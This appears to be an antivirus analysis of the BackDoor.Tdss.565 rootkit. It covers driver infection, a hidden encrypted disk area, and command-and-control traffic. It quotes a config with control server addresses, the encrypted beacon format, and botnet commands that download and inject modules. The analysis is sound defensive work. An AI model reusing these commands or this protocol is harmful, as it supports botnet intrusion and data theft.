Vulnerable OS: Windows XP/Windows Vista/Windows 7
For those interested in complete description of BackDoor.Tdss.565, we recommend to read the relevant (Fr) article prepared by Doctor Web Virus Analysts.
BackDoor.Tdss.565 injects its code into the system process on installation, and then uses it to create and start a temporary tdlserv service:
[HKLM\system\currentcontrolset\services\tdlserv]
Imagepath=" \??\C:\DOCUME~1\
Type=1
To ensure future automatic loading, this driver infects the system driver of the physical drive where the operating system resides (for instance, atapi.sys). Original bytes of the infected driver and the rootkit core code are preserved in last disk sectors. Also, last disk sectors serve as a hidden encrypted virtual drive, which is used to store the tdlcmd.dll and tdlwsp.dll user mode components and the config.ini configuration file. The rootkit hides changes to the operating system and implements injection of user mode components according to the configuration file.
Example of the config.ini contents:
[main]
version=3.0
botid=4513c055-11f2-8278-7863-3d82b9b804c8
affid=10002
subid=0
installdate=1.10.2009 9:4:38
[injector]
svchost.exe=tdlcmd.dll
*=tdlwsp.dll
[tdlcmd]
servers=https://h3456345.cn/;https://h9237634.cn/;https://212.117.174.173/
This module updates the rootkit and its components from a control server. From its own name, the module derives the path to the virtual drive created by the rootkit driver, and then reads information on control servers, bot identifier, etc from the config.ini. It also receives information on system version and language, and default Internet browser. The information collected is presented in the following format:
4513c055-11f2-8278-7863-3d82b9b804c8|10002|0|3.0|3.1|5.1 2600 SP1.0|ru-ru|iexplore
(botid|affid|Subid|bot_version|loader_version|system_version|locale|browser)
The string is encrypted by RC4 with the control server name as a key (for instance, h3456345.cn), then the result is encoded to base64. The resulting query is then sent to the control server.
Example:
https://h3456345.cn/gJdwOLwW21dVuODFVDCvEuknIdD1k+Bc8Rnq3uFl2VbBscU44iqKKslUgRXjw2Rb
/Vk48jWDFc3HwZ+Mno1/yx+sVdbaH0XgRMuAczm9JI2KBg==
The server replies with an encoded set of instructions, which the rootkit then executes. These instructions comprises of names of function implemented in loaded malicious modules and their execution parameters.
Example:
botnetcmd.ModuleDownloadUnxor('https://h3456345.cn/2c0lfrNDklNZveSSVX6nFesyPdarl/5J8ErqwbRkjV3ctsI4rHmDeMFWyUan0Q==', '\\?\globalroot\systemroot\system32\botnetwsp8y.dll')
botnetcmd.InjectorAdd('*','botnetwsp8y.dll')
botnetcmd.SetCmdDelay(14400)
botnetcmd.FileDownloadRandom('https://h3456345.cn/2c0lfrNDklZZveSSVX6nFesyPdarl/5J8ErqwbRkjV3ctsI4rHmDeMFWyUan0Q==','\\?\globalroot\systemroot\system32\botnet.dat')
tdlcmd.ConfigWrite('tdlcmd','delay','1800')
tdlcmd.ConfigWrite('tdlcmd','servers','https://h3456345.cn/;https://h9237634.cn/;https://212.117.174.173/')
The links in the execution parameters are encrypted commands for the control server. For instance,"2c0lfrNDklNZveSSVX6nFesyPdarl/5J8ErqwbRkjV3ctsI4rHmDeMFWyUan0Q==" equals "module|1!4513c055-11f2-8278-7863-3d82b9b804c8!". The files downloaded from these links are encoded using the bot identifier (4513c055-11f2-8278-7863-3d82b9b804c8).
In this example, botnetwsp8y.dll is an update for the tdlwsp.dll module, and the botnet.dat is a list of control servers.
This module injects itself into all processes according to the configuration file, but operates in those processes only which names contain one of the following substrings: explore, firefox, chrome, opera, safari, netscape, avant, or browser. The module hooks the mswsock.dll!WSPStartupfunction, and then in the SPI(service provider interface) table of its handler (WSPStartup) replaces the WSPSend, WSPRecv and WSPCloseSocket procedures with its own. Thus, this module operates as a common LSP (Layered Service Provider).
After the functions are hooked, the rootkit controls all user search queries, therefore it can substitute results returned by search engines and forward the user to malicious websites. Instructions on where to forward the user and how to process key words are received from the control server.
